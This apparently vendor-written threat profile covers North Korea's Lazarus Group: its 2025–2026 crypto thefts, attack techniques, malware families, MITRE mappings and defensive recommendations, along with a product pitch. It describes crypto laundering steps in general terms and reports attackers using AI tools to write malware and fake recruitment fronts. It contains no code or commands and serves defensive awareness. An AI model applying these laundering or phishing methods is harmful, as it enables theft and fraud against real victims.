Lazarus Group is a North Korean state-sponsored cyber threat actor and one of the most prolific cybercrime syndicates operating globally. In 2026, the group has evolved well beyond traditional espionage into a dominant force in financially motivated cyber operations — now augmented by artificial intelligence (AI) and sophisticated cryptocurrency laundering infrastructure.

During the first half of 2026, Lazarus intensified its focus on decentralized finance (DeFi) platforms and Web3 ecosystems across the Asia-Pacific (APAC) region. The group’s AI-assisted spearphishing campaigns, expanded supply chain trojanization efforts, and novel laundering networks routed through APAC exchanges represent a materially elevated threat profile for the region.

Numerous cybersecurity vendors and government agencies track the threat actor under a wide range of aliases, including APT-C-26, Appleworm, Diamond Sleet, Guardians of Peace, Hidden Cobra, Labyrinth Chollima, Slow Pisces, TA404, UNC2970, UNC4034, Zinc, and several others.

Origin and Target Regions 

Attributed to North Korea (DPRK), Lazarus Group’s operations have targeted countries worldwide, including Australia, Brazil, Canada, China, Germany, India, Japan, South Korea, the United States, the United Kingdom, and many more across Asia, Europe, and the Americas. The group focuses on high-value sectors including aerospace and defense, banking and financial services, cryptocurrency exchanges and DeFi platforms, education, energy and utilities, government, healthcare, media, technology, and transportation and logistics.

2026 Evolution

The use of generative AI tools by Lazarus-affiliated actors is now documented, not speculated. According to online reports, an investigation into the HexagonalRodent subgroup found that attackers used tools including ChatGPT and Cursor to write malware code, build fake company websites, and create entirely fictional leadership teams to lend credibility to fraudulent recruitment fronts. The same subgroup exfiltrated 26,584 cryptocurrency wallets from 2,726 infected developer systems in just the first three months of 2026, with public keys for wallets holding up to $12 million in crypto assets exposed.

Also, security researchers flagged AI-enabled deepfakes and more precise spearphishing as expected near-term escalations in Lazarus methodology — a prediction that has since been borne out by the Zerion incident in April 2026, where AI-enabled social engineering was used to gain access to team members’ sessions, credentials, and private keys.

Major 2025–2026 Cryptocurrency Theft Operations

The scale of Lazarus Group’s financial operations has reached levels that reshape how the crypto sector models threat exposure:

Bybit (February 2025): The largest cryptocurrency theft ever recorded. Lazarus stole approximately $1.46–1.5 billion in Ethereum from Dubai-based exchange Bybit by compromising Safe{Wallet}, a widely used multi-signature wallet platform, and manipulating the transaction approval process so Bybit signers unknowingly authorised a malicious transfer. The FBI officially attributed the attack to Lazarus on February 26, 2025. Laundering began within hours: stolen ETH was converted to Bitcoin and other assets via THORChain and dispersed across thousands of addresses. At least $160 million was laundered within the first 48 hours.

KelpDAO (April 2026): Attributed to TraderTraitor (a Lazarus sub-unit), the KelpDAO exploit drained approximately $292 million via a compromised rsETH bridge on LayerZero. Proceeds again moved through THORChain before going dormant.

Cryptocurrency Laundering Methods

Following the Bybit hack, blockchain analytics firms Nansen and Chainalysis documented Lazarus’s laundering methodology in detail. The process involves converting illiquid staked tokens into liquid assets (primarily ETH and BTC), routing funds through decentralised exchanges, cross-chain bridges, and no-KYC instant swap services, and breaking transactions repeatedly across intermediate wallets to complicate tracing. THORChain has emerged as a consistently used exit ramp — assets enter as ETH and emerge as BTC. The group also lets certain wallets sit dormant for extended periods to allow investigative scrutiny to subside before moving funds.

How Cyble Hawk Supports Detection

Identifying Lazarus activity before it reaches its target requires visibility into the dark web and underground forums where pre-operational infrastructure is staged and credentials are traded. Cyble’s dark web monitoring capability provides continuous coverage of these channels — including newly registered C2 infrastructure, credential marketplaces where APAC exchange and financial institution logins are sold, and early malware samples shared in closed communities before broad deployment.

Operational Overview 

Lazarus Group’s operations span a wide range of techniques, from spearphishing with malicious attachments to drive-by compromise of legitimate websites. During Operation Dream Job, Lazarus deployed fake job offers via LinkedIn and other platforms, tricking targets into opening malicious Microsoft Word documents or clicking malicious links. The 2026 evolution of these operations is characterised by greater AI-assisted personalisation of lures and tighter integration between initial access and financial exfiltration objectives.

Tactics, Techniques, and Procedures (TTPs) 

The Lazarus Group gains entry into systems through several methods. They deliver malware by compromising legitimate websites and tricking users into unknowingly downloading malicious software. They also send carefully crafted emails with harmful attachments or links designed to target specific individuals. Additionally, they use social media platforms like LinkedIn to send targeted phishing messages, enticing victims to click on malicious content. 

Once inside a system, Lazarus Group uses various techniques to execute malicious code and move laterally within the network. They leverage built-in system tools to run commands and automate tasks that help maintain their presence. The group often embeds malicious macros in documents to execute code when opened.     

They exploit native system functions to gather information and communicate covertly with their command servers. Furthermore, they take advantage of software vulnerabilities, such as those in Adobe Flash, to execute harmful code. They also use deceptive files and links to lure victims into running malware.    

To stay hidden and maintain long-term access, Lazarus Group uses legitimate credentials to access restricted parts of the network. They also manipulate account settings, such as renaming administrator accounts, to avoid detection and continue their operations without interruption.    

Malware Arsenal

Lazarus Group utilizes a vast collection of malware families, including but not limited to: 

• Backdoors: DarkComet, Gh0st RAT, Andaratm, ARTULFPIE, BADCALL, Dtrack
• Credential Stealers: Mimikatz, ProcDump, Castov
• Loaders & Downloaders: XORIndex, Agamemnon, BlindToad, Hotwax, PowerSpritz, OtterCookie, DPAPILoader, RemotePELoader
• Wipers: Destover, CleanToad, KillDisk, Junk, BootWreck
• Tunneling Tools: 3proxy, Stunnel, ClientTrafficForwarder
• Ransomware: Hermes
• macOS: Mach-O Man kit (Go-compiled Mach-O binaries; macrasv2 stealer module), RemotePE (fileless RAM-resident RAT)

Conclusion 

Lazarus Group is not a static threat. The group’s 2025–2026 operations — including the $1.5 billion Bybit heist, the KelpDAO and Drift exploits, AI-assisted developer targeting, and the Mach-O Man macOS campaign — demonstrate a threat actor continuously expanding both its technical capability and its target surface. According to TRM Labs, cumulative attributed theft now exceeds $6 billion since 2017, with North Korean actors responsible for 76% of all global crypto hack losses in the first four months of 2026 alone.

For security teams, the implication is clear: Lazarus operates with state resources, strategic patience, and an increasingly diverse toolkit. Defensive postures built around any single attack vector are insufficient.

See how Cyble Hawk tracks Lazarus Group → | Subscribe for weekly threat actor profiles → 

Mitigations and Recommendations  

• Improve Email Security: Use strong email filters to block phishing emails. Train staff to spot suspicious messages. 

• Keep Software Updated: Apply patches and updates quickly. Fix vulnerabilities in software like Adobe Flash. 

• Use Multi-Factor Authentication: Add MFA to all accounts, especially admin ones. This stops attackers with stolen passwords. 

• Limit Macros and Scripts: Turn off macros unless needed. Watch PowerShell and other scripts for strange activities. 

• Manage Credentials Carefully: Change passwords often. Remove unused accounts and check for changes like renamed admins. 

MITRE Attack Techniques Associated with the Lazarus Group 

• Drive-by Compromise (T1189): Delivered RATANKBA and other malware via compromised legitimate websites. 

• Spearphishing Attachment (T1566.001): Sent spearphishing emails with malicious Word documents, as seen in Operation Dream Job, using malicious attachments to gain access. 

• Spearphishing Link (T1566.002): Sent malicious email links, such as Operation Dream Job’s fake OneDrive job offer links. 

• Spearphishing via Service (T1566.003): Used social media platforms like LinkedIn and Twitter to send phishing messages, exemplified by Operation Dream Job’s fake job offers on LinkedIn. 

• Windows Management Instrumentation (T1047): Used WMIC for discovery and payload execution, as in Operation Dream Job’s remote XSL script execution. 

• Scheduled Task (T1053.005): Used scheduled tasks for persistence by creating tasks to periodically execute remote scripts or payloads. 

• PowerShell (T1059.001): Executed commands and malicious code via PowerShell, such as exploring victim environments during Operation Dream Job. 

• Windows Command Shell (T1059.003): Used cmd.exe to run commands and manage the malware lifecycle, including launching DLL files and creating or renaming folders. 

• Exploitation for Client Execution (T1203): Exploited software vulnerabilities like Adobe Flash CVE-2018-4878 to run code.